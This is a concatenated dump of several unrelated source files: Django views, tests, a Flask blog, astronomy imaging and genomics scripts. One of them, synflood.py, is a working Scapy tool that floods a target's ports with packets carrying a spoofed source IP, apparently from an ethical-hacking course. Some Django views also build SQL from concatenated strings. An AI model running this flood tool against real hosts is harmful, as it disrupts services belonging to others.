sharedProjects | publicProjects\n projects = projects.distinct()\n\n proj = projects.get(id=project_id)\n\n shared = None\n if proj.owner.id != request.user.id and not proj.is_public:\n shared = request.user.shared_resource_set.get(project__id=project_id)\n\n proj.mark_viewed(request)\n context = {\n 'project': proj,\n 'studies': proj.study_set.all().filter(active=True),\n 'shared': shared\n }\n return render(request, template, context)\n\n@login_required\ndef request_project(request):\n send_mail(\n 'request@' + settings.PROJECT_NAME + '.appspotmail.com',\n 
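# positional args are sender, recipient, subject, body (App Engine mail API)\n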
settings.REQUEST_PROJECT_EMAIL,\n 'User has requested a Google Project',\n '''\nThe user %s has requested a new Google Project be created. Here is their message:\n\n%s\n ''' % (request.user.email, request.POST['message']))\n\n template = 'projects/project_request.html'\n context = {\n 'requested': True\n }\n return render(request, template, context)\n\n@login_required\ndef project_upload(request):\n if not hasattr(request.user, 'googleproject'):\n template = 'projects/project_request.html'\n else:\n template = 'projects/project_upload.html'\n\n projects = request.user.project_set.all().filter(active=True)\n\n context = {\n 'requested': False,\n 'projects': projects,\n }\n return render(request, template, context)\n\ndef filter_column_name(original):\n return re.sub(r\"[^a-zA-Z0-9]+\", \"_\", original.lower())\n\ndef create_metadata_tables(user, study, columns, skipSamples=False):\n with connection.cursor() as cursor:\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS user_metadata_%s_%s (\n id INTEGER UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n study_id INTEGER UNSIGNED,\n sample_barcode VARCHAR(200),\n file_path VARCHAR(200),\n file_name VARCHAR(200),\n data_type VARCHAR(200),\n pipeline VARCHAR(200),\n platform VARCHAR(200)\n )\n \"\"\", [user.id, study.id])\n\n if not skipSamples:\n feature_table_sql = \"\"\"\n CREATE TABLE IF NOT EXISTS user_metadata_samples_%s_%s (\n id INTEGER UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n participant_barcode VARCHAR(200),\n sample_barcode VARCHAR(200) UNIQUE,\n has_mrna BOOLEAN,\n has_mirna BOOLEAN,\n has_protein BOOLEAN,\n has_meth BOOLEAN\n \"\"\"\n feature_table_args = [user.id, study.id]\n\n for column in columns:\n feature_table_sql += \", \" + filter_column_name(column['name']) + \" \" + column['type']\n\n feature_table_sql += \")\"\n cursor.execute(feature_table_sql, feature_table_args)\n\n@login_required\ndef upload_files(request):\n status = 'success'\n message = None\n proj = None\n study = None\n\n # TODO: Validation\n\n if request.POST['project-type'] == 'new':\n proj = request.user.project_set.create(name=request.POST['project-name'], description=request.POST['project-description'])\n proj.save()\n else:\n proj = request.user.project_set.all().filter(id=request.POST['project-id'])[0]\n\n if proj is None:\n status = 'error'\n message = 'Unable to create project'\n else:\n study = proj.study_set.create(\n name=request.POST['study-name'],\n description=request.POST['study-description'],\n owner=request.user\n )\n\n if request.POST['data-type'] == 'extend':\n # TODO Does this need a share check??\n study.extends_id = request.POST['extend-study-id']\n\n study.save()\n\n upload = UserUpload(owner=request.user)\n upload.save()\n\n config = {\n \"USER_PROJECT\": proj.id,\n \"USER_ID\": request.user.id,\n \"STUDY\": study.id,\n \"BUCKET\": request.user.bucket_set.all()[0].bucket_name,\n \"GOOGLE_PROJECT\": request.user.googleproject.project_name,\n \"BIGQUERY_DATASET\": request.user.googleproject.big_query_dataset,\n \"FILES\": [],\n \"USER_METADATA_TABLES\": {\n \"METADATA_DATA\" : \"user_metadata_\" + str(request.user.id) + \"_\" + str(study.id),\n \"METADATA_SAMPLES\" : \"user_metadata_samples_\" + str(request.user.id) + \"_\" + str(study.id),\n \"FEATURE_DEFS\": User_Feature_Definitions._meta.db_table\n }\n }\n all_columns = []\n\n for formfield in request.FILES:\n file = request.FILES[formfield]\n file_upload = UserUploadedFile(upload=upload, file=file, bucket=config['BUCKET'])\n try :\n file_upload.save()\n except Exception :\n study.delete()\n 
proj.delete()\n upload.delete()\n\n resp = {\n 'status': \"error\",\n 'error' : \"bad_file\",\n 'message': \"There is a problem with the format of your file. Check for empty lines at the end of your file\"\n }\n return JsonResponse(resp)\n\n descriptor = json.loads(request.POST[formfield + '_desc'])\n datatype = request.POST[formfield + '_type']\n fileJSON = {\n \"FILENAME\": file_upload.file.name,\n \"PLATFORM\": descriptor['platform'],\n \"PIPELINE\": descriptor['pipeline'],\n \"BIGQUERY_TABLE_NAME\": \"cgc_\" + (\"user\" if datatype == 'user_gen' else datatype) +\n \"_\" + str(proj.id) + \"_\" + str(study.id),\n \"DATATYPE\": datatype,\n \"COLUMNS\": []\n }\n\n if datatype == \"user_gen\":\n for column in descriptor['columns']:\n if column['ignored']:\n continue\n\n type = column['type']\n if type == 'string' or type == 'url' or type == 'file':\n type = 'VARCHAR(200)'\n else:\n type = filter_column_name(type)\n\n controlled = None\n shared_id = None\n if 'controlled' in column and column['controlled'] is not None:\n controlled = column['controlled']['key']\n shared_id = \"CLIN:\" + controlled # All shared IDs at the moment are clinical TCGA\n else:\n controlled = filter_column_name(column['name'])\n\n fileJSON['COLUMNS'].append({\n \"NAME\" : column['name'],\n \"TYPE\" : type,\n \"INDEX\" : column['index'],\n \"MAP_TO\" : controlled,\n \"SHARED_ID\" : shared_id\n })\n\n all_columns.append({\n \"name\": column['name'],\n \"type\": type\n })\n\n config['FILES'].append(fileJSON)\n\n # Skip *_samples table for low level data\n create_metadata_tables(request.user, study, all_columns, request.POST['data-type'] == 'low')\n\n dataset = request.user.user_data_tables_set.create(\n study=study,\n metadata_data_table=config['USER_METADATA_TABLES']['METADATA_DATA'],\n metadata_samples_table=config['USER_METADATA_TABLES']['METADATA_SAMPLES'],\n data_upload=upload,\n google_project=request.user.googleproject,\n google_bucket=request.user.bucket_set.all()[0]\n )\n\n if settings.PROCESSING_ENABLED:\n files = {'config.json': ('config.json', json.dumps(config))}\n post_args = {\n 'project_id':proj.id,\n 'study_id':study.id,\n 'dataset_id':dataset.id\n }\n success_url = reverse('study_data_success', kwargs=post_args) + '?key=' + upload.key\n failure_url = reverse('study_data_error', kwargs=post_args) + '?key=' + upload.key\n parameters = {\n 'SUCCESS_POST_URL': request.build_absolute_uri( success_url ),\n 'FAILURE_POST_URL': request.build_absolute_uri( failure_url )\n }\n r = requests.post(settings.PROCESSING_JENKINS_URL + '/job/' + settings.PROCESSING_JENKINS_PROJECT + '/buildWithParameters',\n files=files, params=parameters,\n auth=(settings.PROCESSING_JENKINS_USER, settings.PROCESSING_JENKINS_PASSWORD))\n\n if r.status_code < 400:\n upload.status = 'Processing'\n upload.jobURL = r.headers['Location']\n else:\n upload.status = 'Error Initializing'\n\n upload.save()\n\n resp = {\n 'status': status,\n 'message': message\n }\n if status is \"success\":\n resp['redirect_url'] = '/projects/' + str(proj.id) + '/'\n\n return JsonResponse(resp)\n\n@login_required\ndef project_delete(request, project_id=0):\n proj = request.user.project_set.get(id=project_id)\n proj.active = False\n proj.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef project_edit(request, project_id=0):\n name = request.POST['name']\n description = request.POST['description']\n\n if not name:\n raise Exception(\"Projects cannot have an empty name\")\n\n proj = request.user.project_set.get(id=project_id)\n 
proj.name = name\n proj.description = description\n proj.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef project_share(request, project_id=0):\n proj = request.user.project_set.get(id=project_id)\n emails = re.split('\\s*,\\s*', request.POST['share_users'].strip())\n\n create_share(request, proj, emails, 'Project')\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef study_delete(request, project_id=0, study_id=0):\n proj = request.user.project_set.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n study.active = False\n study.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\n@login_required\ndef study_edit(request, project_id=0, study_id=0):\n name = request.POST['name']\n description = request.POST['description']\n\n if not name:\n raise Exception(\"Projects cannot have an empty name\")\n\n proj = request.user.project_set.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n study.name = name\n study.description = description\n study.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\ndef study_data_success(request, project_id=0, study_id=0, dataset_id=0):\n proj = Project.objects.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n datatables = study.user_data_tables_set.get(id=dataset_id)\n\n if not datatables.data_upload.key == request.GET.get('key'):\n raise Exception(\"Invalid data key when marking data success\")\n\n ufds = User_Feature_Definitions.objects.filter(study_id=study.id)\n cursor = connection.cursor()\n\n for user_feature in ufds:\n if ' ' in user_feature.feature_name:\n # Molecular data will not be column names but rather names of features\n continue\n col_name = filter_column_name(user_feature.feature_name)\n\n cursor.execute('SELECT COUNT(1) AS \"count\", '+ col_name +' AS \"val\" FROM ' + datatables.metadata_samples_table)\n values = cursor.fetchall()\n\n for value in values:\n ufc = User_Feature_Counts.objects.create(feature=user_feature, value=value[1], count=value[0])\n ufc.save()\n\n cursor.close()\n\n datatables.data_upload.status = 'Complete'\n datatables.data_upload.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n\ndef study_data_error(request, project_id=0, study_id=0, dataset_id=0):\n proj = Project.objects.get(id=project_id)\n study = proj.study_set.get(id=study_id)\n datatables = study.user_data_tables_set.get(id=dataset_id)\n\n if not datatables.data_upload.key == request.GET.get('key'):\n raise Exception(\"Invalid data key when marking data success\")\n\n datatables.data_upload.status = 'Error'\n datatables.data_upload.save()\n\n return JsonResponse({\n 'status': 'success'\n })\n","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"59545443","text":"#########\n# Copyright (c) 2016 GigaSpaces Technologies Ltd. 
All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\n\nfrom mock import patch\nfrom nose.plugins.attrib import attr\n\nfrom manager_rest import models\nfrom manager_rest.utils import read_json_file, write_dict_to_json_file\nfrom manager_rest.utils import plugin_installable_on_current_platform\nfrom manager_rest.test import base_test\n\n\n@attr(client_min_version=1, client_max_version=base_test.LATEST_API_VERSION)\nclass TestUtils(base_test.BaseServerTestCase):\n\n def test_read_write_json_file(self):\n test_dict = {'test': 1, 'dict': 2}\n tmp_file_path = os.path.join(self.tmpdir, 'tmp_dict.json')\n write_dict_to_json_file(tmp_file_path, test_dict)\n read_dict = read_json_file(tmp_file_path)\n self.assertEqual(test_dict, read_dict)\n\n test_dict = {'test': 3, 'new': 2}\n write_dict_to_json_file(tmp_file_path, test_dict)\n read_dict = read_json_file(tmp_file_path)\n self.assertEqual(3, read_dict['test'])\n self.assertEqual(test_dict, read_dict)\n\n @attr(client_min_version=2,\n client_max_version=base_test.LATEST_API_VERSION)\n def test_plugin_installable_on_current_platform(self):\n def create_plugin(supported_platform=None,\n distribution=None,\n distribution_release=None):\n mock_data = {k: 'stub' for k in models.Plugin.fields}\n if supported_platform:\n mock_data['supported_platform'] = supported_platform\n if distribution:\n mock_data['distribution'] = distribution\n if distribution_release:\n mock_data['distribution_release'] = distribution_release\n return models.Plugin(**mock_data)\n\n plugin = create_plugin()\n self.assertFalse(plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(supported_platform='any')\n self.assertTrue(plugin_installable_on_current_platform(plugin))\n\n platform = 'platform1'\n dist = 'dist1'\n rel = 'rel1'\n\n def mock_linux_dist(full_distribution_name):\n return dist, '', rel\n\n def mock_get_platform():\n return platform\n\n with patch('platform.linux_distribution', mock_linux_dist):\n with patch('wagon.utils.get_platform', mock_get_platform):\n plugin = create_plugin(supported_platform=platform)\n self.assertFalse(\n plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(distribution=dist,\n distribution_release=rel)\n self.assertFalse(\n plugin_installable_on_current_platform(plugin))\n\n plugin = create_plugin(supported_platform=platform,\n distribution=dist,\n distribution_release=rel)\n self.assertTrue(\n plugin_installable_on_current_platform(plugin))\n","sub_path":"rest-service/manager_rest/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529474381","text":"from math import ceil\nfrom flask import render_template, request\nfrom sqlalchemy import desc\nfrom app import app, db\nfrom app.database import Post, Category, Keyword\nfrom app.helpers import urlize, unurlize\n\n@app.route('/')\ndef index():\n stories = 
Post.query.order_by(desc(Post.date)).limit(5).all()\n return render_template('index.html', stories=stories)\n\n@app.route('/blog/', defaults={'path': ''})\n@app.route('/blog/')\ndef blog(path):\n parts = path.rstrip('/').split('/')\n if len(parts) == 1:\n parts = []\n\n if len(parts) % 2 != 0:\n return redirect(url_for('blog'))\n \n elif len(parts) == 2 and parts[0] == 'post':\n p = Post.query.filter(Post.slug == parts[1]).first()\n return render_template('blog.html', posts=[p])\n\n else:\n query = Post.query\n for i in range(0, len(parts), 2):\n field, val = parts[i], parts[i+1]\n if field == 'category':\n query = query.filter(Post.category.has(Category.name \\\n == unurlize(val)))\n elif field == 'keyword':\n query = query.filter(Post.keywords.contains(unurlize(val)))\n elif field == 'postid':\n query = query.filter(Post.id == val)\n\n num_pages = ceil(Post.query.count() / 4)\n\n if 'page' in request.args:\n cur_page = int(request.args['page'])\n else:\n cur_page = 1\n\n\n query = query.order_by(desc(Post.date))\n\n query = query.offset(3 * (cur_page-1)).limit(3)\n\n posts = query.all()\n\n return render_template('blog.html', posts=posts, \n cur_page=cur_page, num_pages=num_pages)\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552162931","text":"\"\"\"\nContinuum imaging scripts. There must be a ``continuum_mses.txt`` file in the\ndirectory this is run in. That file is produced by ``split_windows.py``.\n\nYou can set the following environmental variables for this script:\n EXCLUDE_7M=\n If this parameter is set (to anything), the 7m data will not be\n included in the images if they are present.\n\"\"\"\n\nimport os\nfrom tasks import tclean, exportfits, plotms\nfrom taskinit import msmdtool\nmsmd = msmdtool()\n\nimaging_root = \"imaging_results\"\nif not os.path.exists(imaging_root):\n os.mkdir(imaging_root)\n\nwith open('continuum_mses.txt', 'r') as fh:\n continuum_mses = [x.strip() for x in fh.readlines()]\n\nfor continuum_ms in continuum_mses:\n\n # strip off .cal.ms\n basename = os.path.split(continuum_ms[:-7])[1]\n\n field = basename.split(\"_\")[0]\n\n if os.getenv('EXCLUDE_7M'):\n msmd.open(continuum_ms)\n antennae = \",\".join([x for x in msmd.antennanames() if 'CM' not in x])\n msmd.close()\n suffix = '12M'\n else:\n antennae = \"\"\n suffix = '7M12M'\n\n\n contimagename = os.path.join(imaging_root, basename) + \"_\" + suffix\n\n # make a diagnostic plot to show the UV distribution\n plotms(vis=continuum_ms,\n xaxis='uvwave',\n yaxis='amp',\n avgchannel=1000, # minimum possible # of channels\n plotfile=contimagename+\".uvwave_vs_amp.png\",\n showlegend=True,\n showgui=False,\n antenna=antennae,\n )\n\n imsize = [3000,3000]\n cellsize = ['0.05arcsec', '0.05arcsec']\n\n for robust in (-2, 0, 2):\n imname = contimagename+\"_robust{0}\".format(robust)\n\n if not os.path.exists(imname+\".image.tt0\"):\n tclean(vis=continuum_ms,\n field=field.encode(),\n imagename=imname,\n gridder='mosaic',\n specmode='mfs',\n deconvolver='mtmfs',\n scales=[0,3,9,27,81],\n nterms=2,\n outframe='LSRK',\n veltype='radio',\n niter=10000,\n usemask='auto-multithresh',\n interactive=False,\n cell=cellsize,\n imsize=imsize,\n weighting='briggs',\n robust=robust,\n pbcor=True,\n antenna=antennae,\n )\n\n exportfits(imname+\".image.tt0\", imname+\".image.tt0.fits\")\n exportfits(imname+\".image.tt0.pbcor\", 
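# and the primary-beam-corrected image produced by pbcor=True\n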
imname+\".image.tt0.pbcor.fits\")\n","sub_path":"reduction/continuum_imaging.py","file_name":"continuum_imaging.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621597569","text":"from __future__ import print_function, absolute_import\nimport os\nimport sys\nfrom argparse import ArgumentParser\nPY2 = sys.version_info[0] == 2\nif PY2:\n from codecs import open\n\nfrom . import bib\nfrom . import schemas\n\n\ndef parse_cmd_line():\n def bibtexfilename(fn):\n if not fn.endswith('.bib'):\n raise ValueError('bibtex filename must end in .bib')\n return fn\n\n argparser = ArgumentParser(description=\"\"\"\n Validator for bibtex files\n \"\"\")\n argparser.add_argument('bibtex', type=bibtexfilename)\n argparser.add_argument('-v', '--verbose', action='store_true')\n argparser.add_argument('--schema', default='ACS', help='The schema specifies which bibtex fields are required for a particular journal. Default=\"ACS\"', choices=['ACS'])\n\n args = argparser.parse_args()\n # print args\n return args\n\ndef main():\n args = parse_cmd_line()\n with open(args.bibtex, 'r', encoding='utf-8') as f:\n lines = os.linesep.join(l.strip() for l in f)\n\n bibobject = bib.Bibparser(lines, verbose=args.verbose)\n bibobject.parse()\n\n schema = getattr(schemas, args.schema)\n bibobject.validate(schema)\n","sub_path":"bibcheck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449190662","text":"import sys\n\nusers={}\n\nbatch = open(sys.argv[1],'r')\n\nlines = batch.readlines()\n\nfor line in lines[1:]:\n elements = line.split(\", \")\n user1 = elements[1]\n user2 = elements[2]\n if user1 in users:\n if user2 not in users[user1]:\n users[user1].append(user2)\n else:\n users[user1]=[user2]\n if user2 in users:\n if user1 not in users[user2]:\n users[user2].append(user1)\n else:\n users[user2]=[user1]\n\n\ndef searchFriends(source, target, track, degree, limit):\n if source not in users:\n return False\n if target in users[source]:\n return True\n elif degree < limit:\n track.append(source)\n for user in users[source]:\n if user not in track:\n if searchFriends(user, target, track, degree+1, limit):\n return True\n return False\n else:\n return False\n\n\nstream = open(sys.argv[2],'r')\n\noutput1 = open(sys.argv[3],'w')\noutput2 = open(sys.argv[4],'w')\noutput3 = open(sys.argv[5],'w')\n\ntranses = stream.readlines()\n\nfor trans in transes[1:]:\n fields = trans.split(\", \")\n id1 = fields[1]\n id2 = fields[2]\n if searchFriends(id1, id2, [], 1, 1):\n output1.write(\"trusted\\n\")\n else:\n output1.write(\"unverified\\n\")\n if searchFriends(id1, id2, [], 1, 2):\n output2.write(\"trusted\\n\")\n else:\n output2.write(\"unverified\\n\")\n if searchFriends(id1, id2, [], 1, 4):\n output3.write(\"trusted\\n\")\n else:\n output3.write(\"unverified\\n\")\n\n\n\n\n\n","sub_path":"insight_testsuite/temp/src/antifraud.py","file_name":"antifraud.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235971049","text":"#!/usr/bin/env python\nfrom scapy.all import *\nfrom scapy.layers.inet import IP, TCP\n\n\ndef syn_flood(src, tgt, msg):\n for d_port in range(1024, 65535):\n ip_layer = IP(src=src, dst=tgt)\n tcp_player = TCP(sport=4444, dport=d_port)\n raw_layer_ = Raw(load=msg)\n pkt = ip_layer / tcp_player / 
raw_layer_\n send(pkt)\n\n\ndef main():\n source = raw_input(\"[*] Enter Source IP Address to Fake: \")\n target = raw_input(\"[*] Enter Target's IP Address: \")\n message = raw_input(\"[*] Enter the Message for TCP Payload: \")\n while True:\n syn_flood(source, target, message)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n exit(0)\n","sub_path":"python/Master-Ethical-Hacking-With-Python/local_networking/synflood.py","file_name":"synflood.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500965468","text":"#!/usr/bin/env python\n##############################################################################\n### To use the functions in this lib simply import this python module using\n### import ensemblUtils\n### Then you'll able able to call functions with the proper arguments using\n### returnVal=ensemblUtils.func1(arg1,arg2)\n##############################################################################\n##############################################################################\nimport sys\nimport os\n\n##############################################################\n# Genomedata is off by one, seq[0] returns you the 1st bp. \n# Have to account for this by subtracting one from each seq coordinate\n# before retrieving sequence from Genomedata.\n# installation: pip install genomedata --user\nfrom genomedata import Genome\n##############################################################\n\nimport string\nimport math\nimport gzip\nimport _pickle as pickle\nimport numpy as np\n\ncomplement = str.maketrans('atcgn', 'tagcn')\n\ndef parse_ensembl_geneAndProtein_pairings(infilename,proteinToGeneDic,proteinPairsDic):\n\t\"\"\"\n\tThis function parses a given Ensembl file downloaded from below folders\n\tand parses out the gene and protein pairings. 
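It is meant to be called once per pairwise orthology file, with the passed-in dictionaries accumulating results across calls.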
\n\tFor the first files, say org1 to org2, it only reports protein pairings.\n\tFor the second file it reports back the protein and gene pairings using\n\tthe protein pairings from the first proteinPairingsSoFar dictionary.\n\tFields of these files are (as far as I understand):\n\t\tsomeScore chr\tnotsure\tstart end orthologytype\n\t\n\t\t0.14740\tMT\t192515\t3307\t4262\tortholog_one2one\t73.39810\tEuarchontoglires\t77\t\n\t\tENSG00000198888\tENSP00000354687\tENSMUSP00000080991\t77\t0\n\n\t\"\"\"\n\tsys.stderr.write(\"Parsing gene and protein pairings from file \"+infilename+\"\\n\")\n\n\tisFirstFile=True\n\tif bool(proteinToGeneDic): # empty dic evaluates to False\n\t\tisFirstFile=False\n\n\tgenePairsDic={}\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t#\n\n\t# it doesn't have a header\n\tlineCount=0\n\tfor line in infile:\n\t\twords=line.rstrip().split()\n\t\tsomeScore,chr,notsure,st,en,orthologyType,someOtherScore,phylo,\\\n\t\t\tgene1PercentIdentity,gene1,protein1,protein2,genename,gene2PercentIdentity,notsure=words ## genename variable added\n\t\t\n\t\t# skip the chromosomes that are not 1..23 or X or Y\n\t\tif chr==\"MT\" or len(chr)>2: \n\t\t\tcontinue\n\t\t\n\t\tif \"ortholog\" not in orthologyType:\n\t\t\tcontinue\n\n\t\tproteinToGeneDic[protein1]=gene1\n\t\tif protein1 not in proteinPairsDic:\n\t\t\tproteinPairsDic[protein1]=[]\n\t\tproteinPairsDic[protein1].append(protein2)\n\n\t\tif not isFirstFile:\n\t\t\tif protein2 not in proteinToGeneDic: # second gene is not from a 1,22 or X,Y chr\n\t\t\t\t#print [chr,gene1,protein1,protein2]\n\t\t\t\tcontinue \n\t\t\tgene2=proteinToGeneDic[protein2]\n\t\t\t# below checks ensure I only get one entry per g1-g2 pair\n\t\t\tif gene1 not in genePairsDic:\n\t\t\t\tgenePairsDic[gene1]=[]\n\t\t\t\tgenePairsDic[gene1].append([gene2,orthologyType,gene1PercentIdentity,gene2PercentIdentity])\n\t\t\telse: \n\t\t\t\tif gene2 not in [a[0] for a in genePairsDic[gene1]]:\n\t\t\t\t\tgenePairsDic[gene1].append([gene2,orthologyType,gene1PercentIdentity,gene2PercentIdentity])\n\t\t\t#\n\t#\n\ttypes={}\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tnum=len(genePairsDic[g1])\n\t\tif type==\"ortholog_one2one\" and num>1:\n\t\t\tsys.exit(\"Matching should be one2one but it isn't\\t\"+g1)\n\t\tif type not in types:\n\t\t\ttypes[type]=0\n\t\ttypes[type]+=1\n\t#\n\tinfile.close()\n\t\n\tsys.stderr.write(\"Gene pair mappings summary: \"+repr(types)+\"\\n\\n\")\n\n\treturn proteinToGeneDic,genePairsDic,proteinPairsDic\n\ndef parse_ensembl_gene_pairings(infilename):\n\t\"\"\"\n\tThis function parses a given Ensembl file (comma seperated) \n\tthat matches the genes of the first organism to the second.\n\t\"\"\"\n\tsys.stderr.write(\"Parsing gene pairings from file \"+infilename+\"\\n\")\n\n\tgenePairsDic={}\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t#\n\t#########################################################################\n\t## Commented by Abhijit \n\t## The file header is changed so the following section needs to be recoded\n\t##\n\t##columnIndices={\"GeneID1\" : -1, \"GeneID2\" : -1, \"Homology Type\" : -1, \"Orthology confidence\": -1, \"Percent Identity\" : -1, \"Chromosome Name\" : []}\n\t## parse the information header first\n\t##columnNames=infile.readline().strip().split(\",\")\n\t##i=0 #0-based column indices\n\t##for c in columnNames:\n\t##\tif c==\"Ensembl Gene 
ID\":\n\t##\t\tcolumnIndices[\"GeneID1\"]=i\n\t##\telif c.endswith(\"Ensembl Gene ID\"):\n\t##\t\tcolumnIndices[\"GeneID2\"]=i\n\t##\telif c==\"Homology Type\":\n\t##\t\tcolumnIndices[\"Homology Type\"]=i\n\t##\telif \"Orthology confidence\" in c:\n\t##\t\tcolumnIndices[\"Orthology confidence\"]=i\n\t##\telif c.endswith(\"Identity with respect to query gene\"):\n\t##\t\tcolumnIndices[\"Percent Identity\"]=i\n\t##\telif c.endswith(\"Chromosome Name\"):\n\t##\t\tcolumnIndices[\"Chromosome Name\"].append(i)\n\t##\ti+=1\n\t#########################################################################\n\n\t######## Rewritten ########\n\tcolumnIndices={\"GeneID1\" : -1, \"GeneID2\" : -1, \"Homology Type\" : -1, \"Orthology confidence\": -1, \"Percent Identity\" : -1, \"Chromosome Name1\" : -1, \"Chromosome Name2\" : -1}\n\t## parse the information header first\n\tcolumnNames=infile.readline().strip().split(\",\")\n\ti=0 #0-based column indices\n\tfor c in columnNames:\n\t\tif c==\"GeneID1\":\n\t\t\tcolumnIndices[\"GeneID1\"]=i\n\t\telif c==\"GeneID2\":\n\t\t\tcolumnIndices[\"GeneID2\"]=i\n\t\telif c==\"Homology Type\":\n\t\t\tcolumnIndices[\"Homology Type\"]=i\n\t\telif c==\"Orthology confidence\":\n\t\t\tcolumnIndices[\"Orthology confidence\"]=i\n\t\telif c==\"Percent Identity\":\n\t\t\tcolumnIndices[\"Percent Identity\"]=i\n\t\telif c==\"Chromosome Name1\":\n\t\t\tcolumnIndices[\"Chromosome Name1\"]=i\n\t\telif c==\"Chromosome Name2\":\n\t\t\tcolumnIndices[\"Chromosome Name2\"]=i\n\t\ti+=1\n\t#\n\tlineCount=0\n\tfor line in infile:\n\t\twords=line.rstrip().split(\",\")\n\t\t# skip the chromosomes that are not 1..23 or X or Y\n\t\t##ch1,ch2 = words[columnIndices[\"Chromosome Name\"][0]],words[columnIndices[\"Chromosome Name\"][1]]\n\t\tch1,ch2 = words[columnIndices[\"Chromosome Name1\"]],words[columnIndices[\"Chromosome Name2\"]]\n\t\tif ch1==\"MT\" or len(ch1)>2 or ch2==\"MT\" or len(ch2)>2:\n\t\t\tcontinue\n\t\t#\n\t\tgene1,gene2= words[columnIndices[\"GeneID1\"]], words[columnIndices[\"GeneID2\"]]\n\t\thomologyType= words[columnIndices[\"Homology Type\"]]\n\t\torthologyConfidence=words[columnIndices[\"Orthology confidence\"]]\n\t\tpercentIdentity=words[columnIndices[\"Percent Identity\"]]\n\t\t# below checks ensure I only get one entry per g1-g2 pair\n\t\tif gene1 not in genePairsDic:\n\t\t\tgenePairsDic[gene1]=[]\n\t\t\tgenePairsDic[gene1].append([gene2,homologyType,orthologyConfidence,percentIdentity])\n\t\telse: \n\t\t\tif gene2 not in [a[0] for a in genePairsDic[gene1]]:\n\t\t\t\tgenePairsDic[gene1].append([gene2,homologyType,orthologyConfidence,percentIdentity])\n\t\t\t#\n\t\t#\n\t\tlineCount+=1\n\t#\n\t#print len(genePairsDic)\n\ttypes={}\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1] \n\t\tnum=len(genePairsDic[g1])\n\t\tif type==\"ortholog_one2one\" and num>1:\n\t\t\tsys.exit(\"Matching should be one2one but it isn't\\t\"+g1)\n\t\tif type not in types:\n\t\t\ttypes[type]=0\n\t\ttypes[type]+=1\n\t#\n\tinfile.close()\n\t\n\tsys.stderr.write(\"Gene pair mappings summary: \"+repr(types)+\"\\n\\n\")\n\n\treturn genePairsDic\n\n\ndef parse_organism_GTF(orgID, infilename, outdir):\n\t\"\"\"\n\tThis function parses a given Ensembl GTF file into the \n\tinternal data structure for that organism. 
\n\tDoes not output anything if outdir is \"None\"\n\t\"\"\"\n\tsys.stderr.write(\"Parsing organism GTF for \"+orgID+\" from file \"+infilename+\"\\n\")\n\tgeneDic={}\n\ttranscriptDic={}\n\texonDic={}\n\tinfoDic={} # build, version, accession\n\tif infilename.endswith(\".gz\"):\n\t\tinfile=gzip.open(infilename,'rb')\n\telse:\n\t\tinfile=open(infilename,'r')\n\t# parse the information header first\n\telemCounts={\"CDS\" : 0, \"exon\" : 0, \"gene\" : 0, \"start_codon\" : 0, \n\t\t\"stop_codon\" : 0, \"transcript\" : 0, \"UTR\" : 0, \"other\" : 0}\n\tlineCount=0\n\tlastReadExon=\"dummy\"\n\tfor line in infile:\n\t\tif line.startswith(\"#\"):\n\t\t\tkey, item = line.split()[:2]\n\t\t\tinfoDic[key.split(\"-\")[-1]]=item\n\t\telse:\n\t\t\telemType=line.rstrip().split(\"\\t\")[2]\n\t\t\tchrName=line.rstrip().split(\"\\t\")[0]\n\t\t\tif chrName==\"MT\" or len(chrName)>2:\n\t\t\t\t#print chrName\n\t\t\t\tcontinue\n\t\t\tif elemType==\"gene\":\n\t\t\t\tnewGene=EnsemblGene(line)\n\t\t\t\tgeneDic[newGene.basicInfoDic[\"gene_id\"]]=newGene\n\t\t\telif 